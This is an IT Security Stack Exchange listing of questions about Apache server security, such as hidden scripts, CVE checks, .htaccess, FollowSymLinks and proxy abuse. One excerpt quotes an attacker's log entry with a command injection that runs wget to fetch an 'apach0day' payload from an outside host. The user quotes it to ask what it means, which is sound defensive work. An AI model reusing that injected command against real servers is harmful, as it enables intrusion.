IT Security Stack Exchange
IT Security Stack Exchange

Questions tagged [apache]

Questions about the security of Apache open source software, especially Apache HTTP Server

The Apache Software Foundation maintain a number of open source software, notably including the Apache HTTP Webserver -

Apache has been the most popular web server on the Internet since April of 1996.

http://www.apache.org/

530 questions
15
votes
4 answers

(How) Can outsiders discover the pages that are being hosted on my server?

I have a web site hosted from my server. Sometimes, I upload database manipulation scripts to a folder which is three levels deep in the website and run them using my web browser. These scripts should not be accessed by outside users and I remove…
Hoytman
  • 483
  • 2
  • 6
  • 10
10
votes
3 answers

Is Apache vulnerable to CVE-2015-1781?

Is Apache vulnerable to CVE-2015-1781 (buffer overflow in the gethostbyname_r() family of functions)? How can I quickly check if a system of mine is secure?
chenwen2
  • 101
  • 3
10
votes
1 answer

Very long HEAD request in server logs: What is the intention?

I'm getting logs like (using Apache server): 119.131.152.148 - - [20/Apr/2016:18:17:47 +0900] "HEAD…
lepe
  • 2,194
  • 2
  • 17
  • 29
6
votes
5 answers

How to secure test/dev environments from outside world?

I would like to set up a security barrier to my test/dev environments. I'm under a more or less typical LAMP on dedicated servers. Thing is, I have some facebook apps, a widget for other devices, and other apps that need to connect to my site via an…
Co Lega
  • 61
  • 1
  • 2
6
votes
1 answer

Does installing Apache on my local machine create new security risks?

I am developing a small LAMP online app, and so far I have been doing all the development online. I am considering installing Apache/PHP/MySQL on my Ubuntu machine to be able to develop locally as well, but I am wondering if by installing Apache on…
Daniel Scocco
  • 163
  • 5
6
votes
2 answers

How to get site's 'real' URL (before being rewritten)

If a site uses .htaccess file to rewrite the URL for e.g. better SEO. Is it possible to find out what is the "real" URL?
user7411
5
votes
1 answer

Apache webserver behind firewall is a victim of proxy abuse and cannot use fail2ban to solve it

We have a new client with a webserver that's getting too much proxy abuse. The access_log is filled with these kind of lines: 64.187.XXX.XXX - - [12/May/2015:10:32:10 -0300] "GET https://ads.exoclick.com:443/ads.js HTTP/1.0" 404 204…
oscillat0r
  • 61
  • 5
5
votes
1 answer

Is it alright to put .htpasswd in the protected directory if there's just one user?

I'm setting up a directory on an Apache server protected with mod_authn_file. The docs for AuthUserFile say not to put the .htpasswd file in the protected directory: Make sure that the AuthUserFile is stored outside the document tree of the…
Robert
  • 607
  • 5
  • 13
4
votes
2 answers

Security benefits by loading modules statically in Apache server

In Apache httpd webserver there are two ways to load modules into the server, static and dynamic. There are some modules which must be loaded static, e.q. mod_so and core. The mod_so must be loaded to enable dynamic loading of module, but it is…
Thomas K
  • 143
  • 6
4
votes
3 answers

Apache logs, suspicious logging apach0day

today I received this 16X.XXX.XX.77 - - [28/Jul/2014:--:--:--] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 200 3596 "-" "chroot-apach0day" so with HTTP_USER_AGENT: chroot-apach0day REQUEST_URI:…
ptx
  • 41
  • 4
4
votes
1 answer

What attacks new Apache 2.0 vulnerable to?

I am new to Security field and still learning how all the attacks works. for my testing, I have implemented Apache 2.0 on a Cent OS virtual machine. I have created another machine using FreeBSD, where I have installed honeyd to create honeypots. I…
Riley Willow
  • 1,139
  • 9
  • 11
3
votes
1 answer

Apache, DocumentRoot and path traversal - /manual/ query

A PCI scanner of a client is current showing a potential path traversal exploit. The document root is set to /home/somefolder/somewebfoldername/ YET, visiting ourwebsite.com/manual shows the Apache manual. The same goes for…
flukeflume
  • 165
  • 1
  • 1
  • 4
3
votes
1 answer

Checking if Mod_Rewrite is Enabled Remotely

When pentesting it is useful to know when apache mod_rewrite is enabled. But when one comes across a web server that does not utilize PHP it is difficult to tell if mod_rewrite is enabled considering that URL redirection isn't very necessary. Is…
Bhubhu Hbuhdbus
  • 405
  • 1
  • 6
  • 13
2
votes
1 answer

What are the consequences of turning on Apache AllowEncodedSlashes?

What are the consequences of turning on Apache AllowEncodedSlashes? I want to turn it on and I want to know if this any worse than any of the other kinds of injection attacks that may occur in web apps?
Casebash
  • 601
  • 1
  • 7
  • 16
2
votes
1 answer

What is the security problem of Options FollowSymLinks in the Apache configuration?

What is the security problem to use Options FollowSymLinks in the Apache configuration? We use the following configuration: AllowOverride None Options None FollowSymLinks
Michael
  • 1,479
  • 1
  • 18
  • 37
1
2 3